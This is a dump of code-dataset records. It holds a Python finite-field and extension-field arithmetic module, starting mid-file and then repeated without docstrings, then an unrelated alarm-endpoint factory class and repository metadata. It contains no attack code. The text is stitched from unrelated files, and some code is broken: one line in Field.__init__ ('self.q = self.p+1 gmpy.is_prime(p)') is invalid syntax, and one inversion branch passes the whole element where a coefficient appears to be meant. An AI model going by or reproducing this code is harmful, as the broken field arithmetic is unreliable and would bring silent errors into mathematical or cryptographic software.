abos = self.F.pmul(a02-a11,mod)
invabis = self.F.invert(abis)
abb = self.F.pmul(abus,invabis)
abb1 = self.F.pmul(abb,a1)
abbbos = self.F.pmul(abb,abos)
c2 = self.F.pmul(abb1-a2,self.F.invert(abis-abbbos))
abosc2 = self.F.pmul(abos,c2)
c1 = self.F.pmul(-a1-abosc2,invabis)
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul(z1-self.F.pmul(a1c2+a2c1,mod),self.F.invert(a0))
invap = polynom(self.F,[c2,c1,c0])
inva = ExtensionFieldElem(self,invap)
return inva
else :
# inversion in a field of char. != 2,3
# this inversion takes a longer time (than previous method)
# it uses extended Euclid's algorithm
P = ExtensionFieldElem(self,self.irpoly)
r,u,v = self.extendedeuclide(P,a)
n,d = r.poly.truedeg()
assert n == self.deg-2
c = r.poly.coef[len(r.poly.coef)-1].invert()
cp = polynom(self.F,[c])
ce = ExtensionFieldElem(self,cp)
return ce*v
def invertible(self,a):
''' Return True if a is invertible
'''
return not self.reduc(a)==self.zero()
def div(self,a,b):
return a*self.invert(b)
def eucldiv(self,a,b):
''' Return a/b and a%b
a and b are of length d-1 where d is the degree of the irreducible polynomial
'''
zero = self.F.zero()
izero = self.zero()
d = self.deg
assert not b.poly.iszero() # Do not divide by zero
if a.poly.iszero() :
return izero, izero # quotient is zero, remain is zero
elif a == b:
return self.one(), izero # quotient is one, remain is zero
#Notations
A = a.poly.coef
B = b.poly.coef
n, da = a.poly.truedeg() # position of first non zero elem of a and degree of a
m, db = b.poly.truedeg() # same for b
if da<db :
# deg(a)<deg(b)
return izero, a # quotient is zero, remain is a
elif da==db:
#deg(a)=deg(b)
deg = max(d-1,da)
rc = [zero]*(deg)
qc = [zero]*(deg)
q = A[n]/B[m]
for i in range(1,deg):
rc[i] = A[n+i]-q*B[m+i]
qc[deg-1] = q
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
else :
# deg(a)>deg(b)
deg = max(d-1,da)
p = deg - da
rc = [zero]*(deg)
qc = [zero]*(deg)
rc[deg-da:] = A[n:]
pm=0
while p+pm+db<deg+1:
#k is the position of the index of the quotient
k = deg-(da-db)-1+pm
qc[k] = rc[p+pm]/B[m]
for i in range(db):
rc[i+p+pm] = rc[i+p+pm]- qc[k]*B[m+i]
pm=pm+1
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
def reduc(self,a):
''' Return a % self.irpoly
The polynomial a = [a_0,...,a_n-1] is returned modulo the irreducible polynomial
The reduced polynomial has length at most d-1 where d is the length
of the irreducible polynomial
'''
assert a.F.F == self.F
if a.poly.iszero() :
return self.zero()
elif a.poly == self.irpoly :
return self.zero()
elif a.deg < self.deg :
c = [self.F.zero()]*(self.deg-1-a.deg)
newacoef = c+a.poly.coef
newapoly= polynom(self.F, newacoef)
newaelem = ExtensionFieldElem(self, newapoly)
return newaelem
else :
# Case where a is not zero or the irreducible polynomial and deg(a)>=deg(irpoly)
q,r = self.eucldiv(a,ExtensionFieldElem(self,self.irpoly))
r = self.trunc(r)
return self.reduc(r)
def reduc2(self,a):
''' a is a list of length (d-1)*2-1 (polynomial length)
this method returns the equivalent element of length d-1
using the table of equivalences (build from the irreducible polynomial)
in the function self.table()
'''
As = a[:(self.deg-2)]
Ad = a[(self.deg-2):]
b = list(dot(As,self.tabular)+Ad)
newapoly = polynom(self.F,b)
newa = ExtensionFieldElem(self,newapoly)
return newa
def trunc(self,a):
'''Return an ExtensionFieldElem of length d-1 where d = deg(irpoly)
'''
d = self.deg
if a.deg == d-1:
return a
c = a.poly.coef[a.deg-d+1:] # the (d-1) last elements of a
cp = polynom(self.F,c)
return ExtensionFieldElem(self,cp)
def table(self):
''' This method returns a table (usually) stored in self.tabular
which is used to compute reduction after a multiplication
between two elements
'''
d = self.deg
T = zeros((d-2,d-1),dtype=object_)
Pc = self.irpoly.coef[1:]
for i in range(0,d-2):
Qc = [self.F.zero()]*(2*(d-1)-1)
Qc[i+1:i+d] = Pc
Qp = polynom(self.F,Qc)
Qe = ExtensionFieldElem(self,Qp)
Q = self.reduc(-Qe)
T[i] = array(Q.poly.coef)
return T
def extendedeuclide(self,a,b):
'''Return s,u,v such as s = ua + vb, s is the gcd of a and b
This method is used to compute the inverse of a mod b (when s=1)
'''
#init
one = self.one()
zero = self.zero()
s = a
u = one
v = zero
sp = b
up = zero
vp = one
#loop : invariants are s = ua+vb and sp = up*a+vp*b
while not sp.poly.iszero() :
q,r = self.eucldiv(s,sp)
s,u,v,sp,up,vp = sp, up, vp, r, u-up*q,v-vp*q
return self.reduc(s),self.reduc(u),self.reduc(v)
def __str__(self):
return str(self.F)+"/"+str(self.irpoly)
def jsonable(self):
return {'type': 'Field Extension', 'F': self.F, 'irpoly': self.irpoly, 'degree':self.deg-1}
class ExtensionFieldElem(FieldElem):
def __init__(self,F,poly):
'''Define the Extension Field and the representative polynomial
'''
self.F = F
self.poly = poly
self.siz = len(poly.coef)
self.deg = self.siz
def __str__(self):
x = self.F.rep
p = self.poly
s = '('
if self.siz == 1 :
s = s+str(p.coef[0])
if self.siz == 2 :
s = s+str(p.coef[0])+'*'+x+' + '+str(p.coef[1])
if self.siz > 2 :
s =s+str(p.coef[0])+'*'+x+'**'+str(self.siz-1)
for i in range(1,self.siz-2):
s = s+' + '+str(p.coef[i])+'*'+x+'**'+str(self.siz-1-i)
s = s+' + '+str(p.coef[self.siz-2])+'*'+x +' + '+str(p.coef[self.siz-1])
return s+')'
def __eq__(self,other):
try:
return self.F == other.F and self.poly == other.poly
except:
return False
def fingerprint(self):
return self.poly.fingerprint()
def jsonable(self):
return {'type': 'ExtensionFieldElem', 'F': self.F, 'poly': self.poly, 'size': self.siz}
class polynom:
''' This class represents a polynomial written P = c_nX**n+...c_1X+c_0
c_0,...,c_n are in the Field F (which can be an ExtensionField) so they are either FieldElem or ExtensionFieldElem
coef is a list : coef = [c_n,...,c_0] of length n+1
'''
def __init__(self,F,coef):
self.F = F # The field in which coeficients belong
if isinstance(coef,list):
self.coef = coef # A list of coeficient in decreasing order (by convention) of the polynomial's degree
self.deg = len(coef) # The degree+1 of the polynomial
else :
#coef is not a list but a single element
self.coef = [coef]
self.deg = 1
def __eq__(self,other):
try:
return (self.F == other.F and self.coef == other.coef)
except:
return False
def __str__(self):
# Not consistent with representation letter of the fields
x = self.F.rep
if x == None:
x = 'X'
s = '('
if self.deg == 1 :
s = s+str(self.coef[0])
if self.deg == 2 :
s = s+str(self.coef[0])+'*'+x+' + '+str(self.coef[1])
if self.deg > 2 :
s =s+str(self.coef[0])+'*'+x+'**'+str(self.deg-1)
for i in range(1,self.deg-2):
s = s+' + '+str(self.coef[i])+'*'+x+'**'+str(self.deg-1-i)
s = s+' + '+str(self.coef[self.deg-2])+'*'+x +' + '+str(self.coef[self.deg-1])
return s+')'
def fingerprint(self):
L = []
for c in self.coef:
L.append(c.fingerprint())
return fingexp.fingerprint(L)
def iszero(self):
'''Return True if it is a zero polynomial (each coefficient is zero)
This does not return True if the polynomial is the polynomial that generates the extension field
'''
cond = True
for i in self.coef:
pcond = i.iszero()
cond = pcond*cond
return cond
def truedeg(self):
'''Return the position of the first non zero coefficient and the actual degree of the polynomial
'''
if self.iszero():
return 0,0
n = 0
while self.coef[n]==self.F.zero():
n = n+1
# n is the position of the first non zero coeff of the polynomial
return n, self.deg-n # position and actual degree of the polynomial
def jsonable(self):
return {'type': 'polynomial', 'F': self.F, 'coeficients': self.coef, 'degree': self.deg}
| 33.584054
| 132
| 0.494208
|
from numpy import *
import gmpy
from Crypto.Random.random import randint
import random as rd
import tools.fingexp as fingexp
import tools.utils as utils
class Field(fingexp.FingExp):
def __init__(self,p):
self.F = self
self.p = gmpy.mpz(p)
self.char = self.p
self.q = self.p+1 gmpy.is_prime(p)
self.rep = None
self.g = None
self.to_fingerprint = ["p"]
self.to_export = {"fingerprint": [],"value": ["p"]}
super(Field, self).__init__()
def load(self, data, fingerprints):
self.p = utils.b64tompz(data["p"])
def one(self):
return FieldElem(1, self)
def zero(self):
return FieldElem(0,self)
def elem(self,x):
if isinstance(x,FieldElem):
assert x.F == self
return x
m = gmpy.mpz(1)
assert isinstance(x,int) or isinstance(x, long) or type(x)==type(m)
return FieldElem(x,self)
def random(self,low=1,high=None):
if high == None :
high = int(self.p-1)
rand = randint(low,high)
return self.elem(rand)
def __eq__(self, other):
try:
return (self.p == other.p)
except:
return False
def add(self, a, b):
return FieldElem((a.val + b.val) % self.p, self)
def sub(self, a, b):
return FieldElem((a.val - b.val) % self.p, self)
def neg(self, a):
return FieldElem((self.p - a.val ) % self.p, self)
def mul(self, a, b):
if not isinstance(b,FieldElem) :
if b<0:
return self.smul(-a,-b)
return self.smul(a,b)
else:
return self.pmul(a,b)
def smul(self,a,b):
if not isinstance(b,FieldElem):
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
else :
return self.smul(b,a)
def sm(self,b,a):
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
def pmul(self,a,b):
return FieldElem((a.val * b.val) % self.p, self)
def dbleAndAdd(self,P,Pp,n):
if n == 0 :
return self.zero();
if n == 1 :
return P
elif n%2 == 1 :
Q = self.dbleAndAdd(P,Pp,(n-1)/2)
return P+Q+Q
elif n%2 == 0 :
Q = self.dbleAndAdd(P,Pp,n/2)
return Q+Q
def powop(self, a, b):
m = gmpy.mpz(1)
if not isinstance(b, int) and not isinstance(b, long) and not type(b)==type(m):
raise Exception("Exponentation by a non integer, long or mpz")
c = b
if c > self.char-1 or c<0:
c = b%(self.char-1)
if c == 0 :
assert not a.val%self.char == 0
return self.one()
elif c == 1 :
return a
else :
return self.sqrtAndMultply(a,a, c)
def sqrtAndMultply(self,P,Pp,n):
if n == 0 :
return self.one()
elif n == 1 :
return P
elif n%2 == 1 :
Q = self.sqrtAndMultply(P,Pp,(n-1)/2)
return P*self.square(Q)
elif n%2 == 0 :
Q = self.sqrtAndMultply(P,Pp,n/2)
return self.square(Q)
def square(self,a):
return FieldElem(pow(a.val,2, self.p), self)
def invert(self,a):
assert not (a.val%self.p == 0)
return FieldElem(gmpy.invert(a.val, self.p), self)
def div(self,a,b):
assert not (b.val%self.p == 0)
return FieldElem((a.val*self.invert(b).val % self.p),self)
def findnonresidue(self):
g=self.random()
while g.isquadres():
g = self.random()
return g
def __str__(self):
return "F_"+str(self.p)
def jsonable(self):
return {'type': 'FqField', 'p': self.p}
class FieldElem():
def __init__(self, val, F):
self.F = F
self.val = gmpy.mpz(val)
self.poly = polynom(self.F,[self])
def __eq__(self, other):
try:
return ((self.val%self.F.char) == (other.val%self.F.char) and self.F == other.F)
except:
return False
def __add__(self, other):
return self.F.add(self, other)
def __neg__(self):
return self.F.neg(self)
def __sub__(self, other):
return self.F.sub(self, other)
def __radd__(self, other):
return self.__add__(other)
def __mul__(self, other):
return self.F.mul(self, other)
def __rmul__(self, other):
return self.__mul__(other)
def __pow__(self, e):
return self.F.powop(self, e)
def __div__(self,other):
return self.F.div(self,other)
def __truediv__(self,other):
return self.F.div(self,other)
def __str__(self):
return str(self.val)
def iszero(self):
return self == self.F.zero()
def invert(self):
return self.F.invert(self)
def invertible(self):
return self.F.invertible(self)
def isquadres(self):
if (self+self.F.zero()).iszero() :
return False
else :
c = self**((self.F.q-1)/2)
return c==self.F.one()
def squareroot(self):
g = self.F.g
if g == None :
g = self.F.findnonresidue()
self.F.g = g
q = self.F.q
s=0
t=self.F.q-1
while t%2==0:
s=s+1
t=t/2
e = 0
for i in range(2,s+1):
b = 2**(i-1)
b1 = b*2
c = ((self)*(g**(-e)))**((q-1)/b1)
if not c==self.F.one() :
e = e+b
h = self*(g**(-e))
b = (g**(e/2))*(h**((t+1)/2))
assert b**2 == self
return b
def fingerprint(self):
return fingexp.fingerprint(self.val)
def jsonable(self):
return {'type': 'FieldElem', 'F': self.F, 'val': self.val}
class ExtensionField(Field):
def __init__(self,F,irpoly,g=None,rep=None):
self.F = F
self.irpoly = irpoly
self.deg = len(irpoly.coef)
assert self.deg > 0
self.q = self.F.q**(self.deg-1)
self.tabular = self.table()
if rep == None :
self.rep = rd.choice(['B','C','D','E','F','G','H','J','K','L'])
else :
self.rep = rep
self.char = F.char
self.primefield = gmpy.is_prime(self.char)
self.g = g
self.to_fingerprint = ["F","irpoly"]
self.to_export = {"fingerprint": [],"value": ["F","irpoly"]}
def one(self):
One = [self.F.zero()]*(self.deg-1)
One[self.deg-2]= self.F.one()
return ExtensionFieldElem(self,polynom(self.F,One))
def zero(self):
Zero = [self.F.zero()]*(self.deg-1)
return ExtensionFieldElem(self,polynom(self.F,Zero))
def unit(self):
I = self.zero()
I.poly.coef[-2]=self.F.one()
return I
def elem(self,x):
P = self.zero()
P.poly.coef[-1] = x
return P
def random(self):
polycoef = [0]*(self.deg-1)
for i in range(self.deg-1):
polycoef[i] = self.F.random()
poly = polynom(self.F,polycoef)
return ExtensionFieldElem(self,poly)
def __eq__(self, other):
try:
return (self.F == other.F and self.irpoly == other.irpoly)
except:
return False
def add(self, a, b):
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
polysum = [0]*a.deg
for i in range(a.deg):
polysum[i]=a.poly.coef[i]+b.poly.coef[i]
P = polynom(self.F,polysum)
return ExtensionFieldElem(self,P)
def sub(self, a, b):
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
c = self.neg(b)
return self.add(a,c)
def neg(self, a):
ap = [0]*a.deg
for i in range(a.deg):
ap[i] = -a.poly.coef[i]
P = polynom(self.F,ap)
return ExtensionFieldElem(self,P)
def smul(self,a,b):
if not isinstance(b,FieldElem):
A = a.poly.coef
Pc = [0]*len(A)
for i in range(len(Pc)):
Pc[i] = A[i]*gmpy.mpz(b)
return ExtensionFieldElem(self,polynom(self.F,Pc))
else :
return self.smul(b,a)
def pmul(self,a,b):
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
A = a.poly.coef
B = b.poly.coef
k = self.deg-1
if k == 2 and self.F.rep =='A':
a0,a1,b0,b1 = A[0].val,A[1].val,B[0].val,B[1].val
p = self.char
v0 = a0*b0
v1 = a1*b1
c0 = ((a0+a1)*(b0+b1)-v0-v1)%p
c1 = (v1-v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c0e,c1e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
a0 = A[0]
a1 = A[1]
b0 = B[0]
b1 = B[1]
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,b0)
v1 = self.F.pmul(a1,b1)
c0 = self.F.pmul((a0+a1),(b0+b1))-v0-v1
c1 = v1 + self.F.pmul(v0,beta)
cp = polynom(self.F,[c0,c1])
C = ExtensionFieldElem(self,cp)
return C
elif k == 3:
a0,a1,a2 = A
b0,b1,b2 = B
beta = -self.irpoly.coef[-1]
v0,v1,v2 = self.F.pmul(a0,b0), self.F.pmul(a1,b1), self.F.pmul(a2,b2)
c0 = self.F.pmul((a0+a2),(b0+b2))-v0+v1-v2
c1 = self.F.pmul((a2+a1),(b2+b1))-v2-v1+self.F.pmul(beta,v0)
c2 = v2+self.F.pmul(beta,(self.F.pmul((a1+a0),(b1+b0))-v1-v0))
cp = polynom(self.F,[c0,c1,c2])
C = ExtensionFieldElem(self,cp)
return C
else :
prod = convolve(A,B)
return self.reduc2(prod)
def square(self,a):
assert a.F == self
if not a.deg == self.deg-1 :
a = self.reduc(a)
A = a.poly.coef
k = self.deg-1
if k == 2 and self.F.rep == 'A':
a1, a0 = A[0].val,A[1].val
p = self.char
v0 = a0*a1
c0 = ((a0+a1)*(a0-a1))%p
c1 = (v0+v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c1e,c0e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
a1, a0 = A
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,a1)
c0 = self.F.pmul((a0+a1),(a0+self.F.pmul(a1,beta)))-v0-self.F.pmul(beta,v0)
c1 = v0+v0
cp = polynom(self.F,[c1,c0])
return ExtensionFieldElem(self,cp)
elif k == 3:
a2,a1,a0 = A
assert a0.F == self.F
beta = -self.irpoly.coef[-1]
s0 = self.F.square(a0)
t1 = self.F.pmul(a0,a1)
s1 = t1+t1
s2 = self.F.square((a0-a1+a2))
t3 = a1*a2
s3 = t3+t3
s4 = self.F.square(a2)
c0 = s0 + self.F.pmul(beta,s3)
c1 = s1 + self.F.pmul(beta,s4)
c2 = s1 + s2 + s3 - s0 -s4
cp = polynom(self.F,[c2,c1,c0])
return ExtensionFieldElem(self,cp)
else :
return self.F.pmul(a,a)
def invert(self,a):
k = self.deg-1
if k == 2 and self.F.rep == 'A':
A = a.poly.coef
a1,a0 = A[0].val,A[1].val
p = self.char
norm = a0*a0+a1*a1
invnorm = gmpy.invert(norm,p)
c0 = (a0*invnorm) % p
c1 = (-a1*invnorm) % p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
invap = polynom(self.F,[c1e,c0e])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 2 :
A = a.poly.coef
a1,a0 = A[0],A[1]
mod = self.irpoly.coef[-1]
a12 = self.F.square(a1)
mid = self.F.pmul(a12,mod)
norm = self.F.square(a0)+mid
invnorm = self.F.invert(norm)
c = self.F.pmul(a0,invnorm)
d = -self.F.pmul(a1,invnorm)
invap = polynom(self.F,[d,c])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 3 :
A = a.poly.coef
a2,a1,a0 = A[0],A[1],A[2]
mod = -self.irpoly.coef[-1]
z0 = self.F.zero()
z1 = self.F.one()
if a0 == z0:
if a1 == z0:
c0,c1,c2 = z0, self.F.invert(self.F.pmul(a2,mod)), z0
elif a2 == z0:
c0,c1,c2 = z0,z0,self.F.invert(self.F.pmul(a1,mod))
else :
a22 = self.F.square(a2)
a12 = self.F.square(a1)
c2 = self.F.pmul(a12,self.F.invert((self.F.pmul(self.F.pmul(a22,a2),mod)+self.F.pmul(self.F.pmul(a12,a1),mod))))
c1 = self.F.pmul((z1-self.F.pmul(self.F.pmul(a1,c2),mod)),self.F.invert(self.F.pmul(a2,mod)))
c0 = self.F.pmul((-(self.F.pmul(self.F.pmul(a2,mod),c2))),self.F.invert(a1))
else :
if a1 == z0 and a2 == z0:
c0,c1,c2 = self.F.invert(a0),z0,z0
else :
a12 = self.F.pmul(a1,a2)
a12m = self.F.pmul(a12,mod)
a00 = self.F.square(a0)
abis = a00-a12m
if abis == z0:
a11 = self.F.square(a1)
a22 = self.F.square(a2)
a02 = self.F.pmul(a0,a2)
a01 = self.F.pmul(a0,a1)
c2 = self.F.pmul(-a,self.F.invert(self.F.pmul((a02-a11),mod)))
c1 = self.F.pmul(-a2,self.F.invert(a01-self.F.pmul(a22,mod)))
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul((z1-self.F.pmul(a1c2+a2c1,mod)),self.F.invert(a0))
else :
if a1 == z0:
inva0 = self.F.invert(a0)
a02 = self.F.pmul(a0,a2)
a000 = self.F.pmul(a00,a0)
a22 = self.F.square(a2)
a222 = self.F.pmul(a22,a2)
mm = self.F.square(mod)
a222mm = self.F.pmul(a222,mm)
c2 = self.F.pmul(-a02,self.F.invert(a000+a222mm))
a02m = self.F.pmul(a02,mod)
a02mc2 = self.F.pmul(a02m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(-a02mc2,inva00)
a2m = self.F.pmul(a2,mod)
a2mc1 = self.F.pmul(a2m,c1)
c0 = self.F.pmul(z1-a2mc1,inva0)
elif a2 == z0:
a11 = self.F.square(a1)
a111 = self.F.pmul(a11,a1)
a000 = self.F.pmul(a00,a0)
a111m = self.F.pmul(a111,mod)
inva0 = self.F.invert(a0)
c2 = self.F.pmul(a11,self.F.invert(a111m+a000))
a11m = self.F.pmul(a11,mod)
a11mc2 = self.F.pmul(a11m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(a11mc2-a1,inva00)
a1m = self.F.pmul(a1,mod)
a1mc2 = self.F.pmul(a1m,c2)
c0 = self.F.pmul(z1-a1mc2,inva0)
else :
a01 = self.F.pmul(a0,a1)
a22 = self.F.square(a2)
a22m = self.F.pmul(a22,mod)
a02 = self.F.pmul(a0,a2)
a11 = self.F.square(a1)
abus = a01-a22m
abos = self.F.pmul(a02-a11,mod)
invabis = self.F.invert(abis)
abb = self.F.pmul(abus,invabis)
abb1 = self.F.pmul(abb,a1)
abbbos = self.F.pmul(abb,abos)
c2 = self.F.pmul(abb1-a2,self.F.invert(abis-abbbos))
abosc2 = self.F.pmul(abos,c2)
c1 = self.F.pmul(-a1-abosc2,invabis)
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul(z1-self.F.pmul(a1c2+a2c1,mod),self.F.invert(a0))
invap = polynom(self.F,[c2,c1,c0])
inva = ExtensionFieldElem(self,invap)
return inva
else :
P = ExtensionFieldElem(self,self.irpoly)
r,u,v = self.extendedeuclide(P,a)
n,d = r.poly.truedeg()
assert n == self.deg-2
c = r.poly.coef[len(r.poly.coef)-1].invert()
cp = polynom(self.F,[c])
ce = ExtensionFieldElem(self,cp)
return ce*v
def invertible(self,a):
return not self.reduc(a)==self.zero()
def div(self,a,b):
return a*self.invert(b)
def eucldiv(self,a,b):
zero = self.F.zero()
izero = self.zero()
d = self.deg
assert not b.poly.iszero() # Do not divide by zero
if a.poly.iszero() :
return izero, izero # quotient is zero, remain is zero
elif a == b:
return self.one(), izero # quotient is one, remain is zero
#Notations
A = a.poly.coef
B = b.poly.coef
n, da = a.poly.truedeg() # position of first non zero elem of a and degree of a
m, db = b.poly.truedeg() # same for b
if da<db :
# deg(a)<deg(b)
return izero, a # quotient is zero, remain is a
elif da==db:
#deg(a)=deg(b)
deg = max(d-1,da)
rc = [zero]*(deg)
qc = [zero]*(deg)
q = A[n]/B[m]
for i in range(1,deg):
rc[i] = A[n+i]-q*B[m+i]
qc[deg-1] = q
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
else :
# deg(a)>deg(b)
deg = max(d-1,da)
p = deg - da
rc = [zero]*(deg)
qc = [zero]*(deg)
rc[deg-da:] = A[n:]
pm=0
while p+pm+db<deg+1:
#k is the position of the index of the quotient
k = deg-(da-db)-1+pm
qc[k] = rc[p+pm]/B[m]
for i in range(db):
rc[i+p+pm] = rc[i+p+pm]- qc[k]*B[m+i]
pm=pm+1
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
def reduc(self,a):
assert a.F.F == self.F
if a.poly.iszero() :
return self.zero()
elif a.poly == self.irpoly :
return self.zero()
elif a.deg < self.deg :
c = [self.F.zero()]*(self.deg-1-a.deg)
newacoef = c+a.poly.coef
newapoly= polynom(self.F, newacoef)
newaelem = ExtensionFieldElem(self, newapoly)
return newaelem
else :
# Case where a is not zero or the irreducible polynomial and deg(a)>=deg(irpoly)
q,r = self.eucldiv(a,ExtensionFieldElem(self,self.irpoly))
r = self.trunc(r)
return self.reduc(r)
def reduc2(self,a):
As = a[:(self.deg-2)]
Ad = a[(self.deg-2):]
b = list(dot(As,self.tabular)+Ad)
newapoly = polynom(self.F,b)
newa = ExtensionFieldElem(self,newapoly)
return newa
def trunc(self,a):
d = self.deg
if a.deg == d-1:
return a
c = a.poly.coef[a.deg-d+1:] # the (d-1) last elements of a
cp = polynom(self.F,c)
return ExtensionFieldElem(self,cp)
def table(self):
d = self.deg
T = zeros((d-2,d-1),dtype=object_)
Pc = self.irpoly.coef[1:]
for i in range(0,d-2):
Qc = [self.F.zero()]*(2*(d-1)-1)
Qc[i+1:i+d] = Pc
Qp = polynom(self.F,Qc)
Qe = ExtensionFieldElem(self,Qp)
Q = self.reduc(-Qe)
T[i] = array(Q.poly.coef)
return T
def extendedeuclide(self,a,b):
#init
one = self.one()
zero = self.zero()
s = a
u = one
v = zero
sp = b
up = zero
vp = one
#loop : invariants are s = ua+vb and sp = up*a+vp*b
while not sp.poly.iszero() :
q,r = self.eucldiv(s,sp)
s,u,v,sp,up,vp = sp, up, vp, r, u-up*q,v-vp*q
return self.reduc(s),self.reduc(u),self.reduc(v)
def __str__(self):
return str(self.F)+"/"+str(self.irpoly)
def jsonable(self):
return {'type': 'Field Extension', 'F': self.F, 'irpoly': self.irpoly, 'degree':self.deg-1}
class ExtensionFieldElem(FieldElem):
def __init__(self,F,poly):
self.F = F
self.poly = poly
self.siz = len(poly.coef)
self.deg = self.siz
def __str__(self):
x = self.F.rep
p = self.poly
s = '('
if self.siz == 1 :
s = s+str(p.coef[0])
if self.siz == 2 :
s = s+str(p.coef[0])+'*'+x+' + '+str(p.coef[1])
if self.siz > 2 :
s =s+str(p.coef[0])+'*'+x+'**'+str(self.siz-1)
for i in range(1,self.siz-2):
s = s+' + '+str(p.coef[i])+'*'+x+'**'+str(self.siz-1-i)
s = s+' + '+str(p.coef[self.siz-2])+'*'+x +' + '+str(p.coef[self.siz-1])
return s+')'
def __eq__(self,other):
try:
return self.F == other.F and self.poly == other.poly
except:
return False
def fingerprint(self):
return self.poly.fingerprint()
def jsonable(self):
return {'type': 'ExtensionFieldElem', 'F': self.F, 'poly': self.poly, 'size': self.siz}
class polynom:
def __init__(self,F,coef):
self.F = F # The field in which coeficients belong
if isinstance(coef,list):
self.coef = coef # A list of coeficient in decreasing order (by convention) of the polynomial's degree
self.deg = len(coef)
else :
self.coef = [coef]
self.deg = 1
def __eq__(self,other):
try:
return (self.F == other.F and self.coef == other.coef)
except:
return False
def __str__(self):
x = self.F.rep
if x == None:
x = 'X'
s = '('
if self.deg == 1 :
s = s+str(self.coef[0])
if self.deg == 2 :
s = s+str(self.coef[0])+'*'+x+' + '+str(self.coef[1])
if self.deg > 2 :
s =s+str(self.coef[0])+'*'+x+'**'+str(self.deg-1)
for i in range(1,self.deg-2):
s = s+' + '+str(self.coef[i])+'*'+x+'**'+str(self.deg-1-i)
s = s+' + '+str(self.coef[self.deg-2])+'*'+x +' + '+str(self.coef[self.deg-1])
return s+')'
def fingerprint(self):
L = []
for c in self.coef:
L.append(c.fingerprint())
return fingexp.fingerprint(L)
def iszero(self):
cond = True
for i in self.coef:
pcond = i.iszero()
cond = pcond*cond
return cond
def truedeg(self):
if self.iszero():
return 0,0
n = 0
while self.coef[n]==self.F.zero():
n = n+1
return n, self.deg-n
def jsonable(self):
return {'type': 'polynomial', 'F': self.F, 'coeficients': self.coef, 'degree': self.deg}
| true
| true
|
790b28543a58805c78207912115bb3764bd5ceb4
| 1,452
|
py
|
Python
|
src/spacel/provision/app/alarm/endpoint/factory.py
|
mycloudandme/spacel-provision
|
900b8ada0017f727163c5c2ae464e17d747ba0e8
|
[
"MIT"
] | 2
|
2016-05-18T11:10:27.000Z
|
2016-05-18T13:25:04.000Z
|
src/spacel/provision/app/alarm/endpoint/factory.py
|
mycloudandme/spacel-provision
|
900b8ada0017f727163c5c2ae464e17d747ba0e8
|
[
"MIT"
] | null | null | null |
src/spacel/provision/app/alarm/endpoint/factory.py
|
mycloudandme/spacel-provision
|
900b8ada0017f727163c5c2ae464e17d747ba0e8
|
[
"MIT"
] | null | null | null |
import logging
logger = logging.getLogger('spacel.provision.app.alarm.endpoint.factory')
class AlarmEndpointFactory(object):
def __init__(self, factories):
self._factories = factories
def add_endpoints(self, template, endpoints):
endpoint_resources = {}
logger.debug('Injecting %d endpoints.', len(endpoints))
for name, params in endpoints.items():
factory = self._factory_for_type(params, name)
if not factory:
continue
actions = factory.add_endpoints(template, name, params)
if actions:
endpoint_resources[name] = {
'name': factory.resource_name(name),
'actions': actions
}
else:
logger.debug('Endpoint %s was invalid.', name)
if endpoint_resources:
logger.debug('Built endpoints: %s', endpoint_resources)
return endpoint_resources
def _factory_for_type(self, params, name):
endpoint_type = params.get('type')
if not endpoint_type:
logger.warning('Endpoint %s is missing "type".', name)
return None
factory = self._factories.get(endpoint_type)
if not factory:
logger.warning('Endpoint %s has invalid "type". Valid types: %s',
name, sorted(self._factories.keys()))
return None
return factory
| 33.767442
| 77
| 0.587466
|
import logging
logger = logging.getLogger('spacel.provision.app.alarm.endpoint.factory')
class AlarmEndpointFactory(object):
def __init__(self, factories):
self._factories = factories
def add_endpoints(self, template, endpoints):
endpoint_resources = {}
logger.debug('Injecting %d endpoints.', len(endpoints))
for name, params in endpoints.items():
factory = self._factory_for_type(params, name)
if not factory:
continue
actions = factory.add_endpoints(template, name, params)
if actions:
endpoint_resources[name] = {
'name': factory.resource_name(name),
'actions': actions
}
else:
logger.debug('Endpoint %s was invalid.', name)
if endpoint_resources:
logger.debug('Built endpoints: %s', endpoint_resources)
return endpoint_resources
def _factory_for_type(self, params, name):
endpoint_type = params.get('type')
if not endpoint_type:
logger.warning('Endpoint %s is missing "type".', name)
return None
factory = self._factories.get(endpoint_type)
if not factory:
logger.warning('Endpoint %s has invalid "type". Valid types: %s',
name, sorted(self._factories.keys()))
return None
return factory
| true
| true
|
790b288e1719545deb4204457f8c3a871ba6ca5d
| 2,016
|
py
|
Python
|
base/src/shallowflow/base/sources/_ForLoop.py
|
waikato-datamining/shallow-flow
|
3f1d99921e5138598eb164edeb1d23e6f199501c
|
[
"MIT"
] | null | null | null |
base/src/shallowflow/base/sources/_ForLoop.py
|
